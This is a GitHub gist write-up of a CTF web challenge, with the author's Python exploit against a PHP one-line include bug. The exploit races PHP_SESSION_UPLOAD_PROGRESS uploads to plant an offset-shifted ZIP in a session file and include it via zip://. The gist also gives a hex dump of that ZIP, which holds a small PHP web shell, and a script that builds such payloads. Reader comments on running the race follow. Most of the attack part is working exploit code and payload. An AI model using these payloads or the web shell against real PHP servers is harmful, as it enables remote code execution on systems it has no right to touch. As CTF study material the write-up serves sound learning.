@as3617

as3617/ex.py (secret gist)

Last active July 5, 2021 12:21
1linephp
import sys
import requests
from multiprocessing.dummy import Pool as ThreadPool

HOST = "http://111.186.59.2:50082/"
# Fixed session id: both runners must hit the same /tmp/sess_12 file.
headers = {
    'Connection': 'close',
    'Cookie': 'PHPSESSID=12'
}
# ZIP archive whose two absolute offsets are already shifted by
# len("upload_progress_"), so it parses once PHP writes it into the
# session file behind that prefix.
payload = open('./s.zip', 'rb').read()


def runner1(i):
    # Upload continuously. PHP_SESSION_UPLOAD_PROGRESS makes PHP store the
    # upload progress under the key upload_progress_<payload> in our session
    # file; with session.upload_progress.cleanup on, that entry is removed as
    # soon as each upload finishes, hence the endless loop.
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': payload
    }
    while 1:
        fp = open('/etc/passwd', 'rb')  # any file works, only the upload matters
        r = requests.post(HOST, files={'f': fp}, data=data, headers=headers)
        fp.close()


def runner2(i):
    # Include the session file through the zip wrapper. index.php appends
    # ".php", so the fragment "#s" becomes the member name "s.php";
    # "&a=system&b=..." are separate GET parameters read by the included s.php.
    filename = '/tmp/sess_12%23s&a=system&b=cat%20/dd810fc36330c200a_flag/flag'
    filename = 'zip://%s' % filename
    while 1:
        url = '%s?yxxx=%s' % (HOST, filename)
        r = requests.get(url, headers=headers)
        c = r.text
        # A miss returns highlight_file(index.php), which contains "yxxx";
        # anything else is output of the include (the flag, or warnings from
        # a lost race).
        if c and 'yxxx' not in c:
            print(c)


if sys.argv[1] == '1':
    runner = runner1
else:
    runner = runner2
pool = ThreadPool(32)
result = pool.map_async(runner, range(32)).get(0xffff)
s.zip (hex dump, 174 bytes; the archive ex.py reads, with a single member s.php):

504B0304140000000800F43AE552DBE0973D1E0000002200000005000000732E70687073B0B12FC82850508977770D89564F548FD5803293D46335ADEDED78B900504B01021400140000000800F43AE552DBE0973D1E00000022000000050024000000000000002000000010000000732E7068700A002000000000000100180015FE683C2371D70115FE683C2371D701C5B2593C2371D701504B0506000000000100010057000000510000000000
Description

http://111.186.59.2:50080
http://111.186.59.2:50081
http://111.186.59.2:50082
The three servers are the same, you can choose any one. Each server is reset every 10 minutes.

This challenge is almost the same as https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html.

<?php
($_=@$_GET['yxxx'].'.php') && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.html');

but some of the code is different, so we need to find a new exploit.

With PHP_SESSION_UPLOAD_PROGRESS we can write attacker-controlled bytes into the session file (/tmp/sess_<PHPSESSID>; with the default settings it then holds the prefix upload_progress_, followed by the value we sent as that field, followed by the serialized progress array) and include that file through various stream wrappers. But in this challenge the script appends .php to our path and checks that the first line starts with @<?php, and the session file name cannot end in .php, so we need a wrapper whose syntax lets the part after the archive path absorb the .php. Two candidates:

1. phar wrapper
2. zip wrapper

First I tried the phar wrapper, but it is impossible: phar:// only opens an archive whose file name contains .phar, which /tmp/sess_12 does not (https://stackoverflow.com/questions/59302726/include-php-phar-without-phar-extension). So the second way is left for the exploit.

By accident I found this writeup, which has very useful information: https://github.com/p4-team/ctf/tree/master/2016-04-15-plaid-ctf/web_pixelshop

A zip file is not required to start with the PK signature of a local file header. Readers locate the end-of-central-directory record by scanning back from the end of the file and then follow the absolute offsets stored in it, so if those offsets account for the bytes in front of the archive, the archive does not need to begin at offset 0. And the offsets are simple enough to calculate by hand.


We need to change two offsets in the zip: the "relative offset of local header" field in the central directory file header, and the "offset of start of central directory" field in the end-of-central-directory record.

Both are absolute positions counted from the start of the file. In the session file our archive is preceded by the 16-byte prefix upload_progress_, so each offset is increased by 16: the local header offset goes from 0x00 to 0x10 and the central directory offset from 0x41 to 0x51 (the values visible in the s.zip hex dump above). With that, the zip wrapper unpacks our payload independent of the session prefix.

On the server session.upload_progress.cleanup is enabled, so the upload-progress entry is removed from the session file as soon as the upload request finishes. We therefore need a race condition: one set of threads uploads continuously while another keeps requesting the include, until an include lands at a moment the payload is present.

Then we get the flag!
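The session-file layout and the two-offset edit described above, as an added example that is not part of the gist: a strict ZIP reader and an offset rebaser in Python. It re-parses the s.zip hex from the gist, shows that its stored offsets are the original values plus 16, shows that a reader which trusts the stored offsets accepts it only behind a 16-byte prefix, and builds a fresh payload the same way. Assumptions: session.upload_progress.prefix is PHP's default upload_progress_, and the serialized trailer in simulate_session_file is a constructed stand-in for what PHP appends after the value.

```python
"""Rebase a ZIP's absolute offsets so it parses behind a fixed-length prefix.
Added example, not the gist's code. Assumed: session.upload_progress.prefix is
PHP's default "upload_progress_" (16 bytes), so the PHP_SESSION_UPLOAD_PROGRESS
value lands at offset 16 of the session file; the trailer below is constructed."""
import io
import struct
import zipfile
import zlib

LFH_SIG = b"PK\x03\x04"   # local file header
CDFH_SIG = b"PK\x01\x02"  # central directory file header
EOCD_SIG = b"PK\x05\x06"  # end of central directory record
SESSION_PREFIX = b"upload_progress_"

# The gist's s.zip (174 bytes) split by structure. Both stored offsets are already
# +16: local header says 0x10 (it sits at 0), central directory says 0x51 (at 0x41).
GIST_S_ZIP = bytes.fromhex(
    "504B0304" "1400" "0000" "0800" "F43A" "E552" "DBE0973D" "1E000000" "22000000"
    "0500" "0000" "732E706870"                                       # LFH + "s.php"
    "73B0B12FC82850508977770D89564F548FD5803293D46335ADEDED78B900"  # raw deflate
    "504B0102" "1400" "1400" "0000" "0800" "F43A" "E552" "DBE0973D" "1E000000"
    "22000000" "0500" "2400" "0000" "0000" "0000" "20000000" "10000000" "732E706870"
    "0A00" "2000" "00000000" "0100" "1800"                          # NTFS extra
    "15FE683C2371D701" "15FE683C2371D701" "C5B2593C2371D701"
    "504B0506" "0000" "0000" "0100" "0100" "57000000" "51000000" "0000"  # EOCD
)

def _eocd(data):
    """Find the EOCD from the end; return (position, entry count, CD size, stored CD offset)."""
    pos = data.rfind(EOCD_SIG)
    if pos < 0:
        raise ValueError("no end-of-central-directory record")
    return (pos,) + struct.unpack_from("<HII", data, pos + 10)

def _cd_entries(data, cd_pos, count):
    """Walk the central directory at cd_pos, yielding (entry pos, name, stored LFH offset)."""
    pos = cd_pos
    for _ in range(count):
        if data[pos:pos + 4] != CDFH_SIG:
            raise ValueError("no central directory file header at 0x%x" % pos)
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        lfh_off, = struct.unpack_from("<I", data, pos + 42)
        yield pos, bytes(data[pos + 46:pos + 46 + name_len]).decode(), lfh_off
        pos += 46 + name_len + extra_len + comment_len

def claimed_offsets(data):
    """Stored offsets, read by walking the CD where it physically is (just before the
    EOCD), so this works whether or not the archive has been rebased."""
    eocd, count, cd_size, cd_off = _eocd(data)
    return cd_off, [lfh for _, _, lfh in _cd_entries(data, eocd - cd_size, count)]

def shift_offsets(data, delta):
    """Add delta to every stored offset: the two-field edit the writeup describes."""
    buf = bytearray(data)
    eocd, count, cd_size, cd_off = _eocd(buf)
    for pos, _, lfh_off in list(_cd_entries(buf, eocd - cd_size, count)):
        struct.pack_into("<I", buf, pos + 42, lfh_off + delta)
    struct.pack_into("<I", buf, eocd + 16, cd_off + delta)
    return bytes(buf)

def strict_extract(data, name):
    """Read one member trusting only the stored offsets (no compensation for leading
    bytes); raises ValueError if they do not point at the headers."""
    eocd, count, _, cd_off = _eocd(data)
    for _, member, lfh_off in _cd_entries(data, cd_off, count):
        if member != name:
            continue
        if data[lfh_off:lfh_off + 4] != LFH_SIG:
            raise ValueError("no local file header at 0x%x" % lfh_off)
        method, csize, name_len, extra_len = struct.unpack_from("<H8xI4xHH", data, lfh_off + 8)
        start = lfh_off + 30 + name_len + extra_len
        raw = bytes(data[start:start + csize])
        return zlib.decompress(raw, -15) if method == 8 else raw  # 8 = deflate, 0 = stored
    raise KeyError(name)

def build_session_payload(php_source, prefix=SESSION_PREFIX):
    """Value to send as PHP_SESSION_UPLOAD_PROGRESS: a fresh s.php archive, rebased."""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("s.php", php_source)
    return shift_offsets(out.getvalue(), len(prefix))

def simulate_session_file(payload, prefix=SESSION_PREFIX):
    """Constructed stand-in for /tmp/sess_<id>: prefix, our value, then the serialized
    progress array PHP appends (exact content varies; readers find the EOCD from the end)."""
    return prefix + payload + b'|a:1:{s:4:"done";b:0;}'

def stdlib_read(blob, name):
    """Cross-check with zipfile, which compensates for leading bytes on its own."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.read(name)

if __name__ == "__main__":
    print("stored offsets in s.zip: cd=0x%x lfh=%s" % claimed_offsets(GIST_S_ZIP))
    print(strict_extract(SESSION_PREFIX + GIST_S_ZIP, "s.php"))
    sess = simulate_session_file(build_session_payload(b"@<?php $_GET['a']($_GET['b']);"))
    print(strict_extract(sess, "s.php"), stdlib_read(sess, "s.php"))
```

Run it directly to print the stored offsets of the gist's s.zip and the decoded s.php. Python's zipfile module is more forgiving than strict_extract: it compares the EOCD's real position with the stored central directory offset and silently adds the difference to every offset, so it would also accept an archive that was merely prepended to. strict_extract deliberately does not do that, which is what makes the before/after difference of shift_offsets visible.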

@thi3nl1d0ch4nh

Thank you so much for more details! But how could I run the exploit? I tried to run "python3 ex.py 1" and "python3 ex.py 2" in two different terminals. And what I got was this response from "python3 ex.py 2". But not the flag. Further guidance would be greatly appreciated!

Warning: include(zip:///tmp/sess_12#s.php): failed to open stream: operation failed in /var/www/html/index.php on line 2

Warning: include(): Failed opening 'zip:///tmp/sess_12#s.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 2

@as3617 (Author)

as3617 commented Jul 5, 2021

Just wait!
Because the exploit uses a race condition, you have to wait for the right timing.

@thi3nl1d0ch4nh

I got it. Thank you!
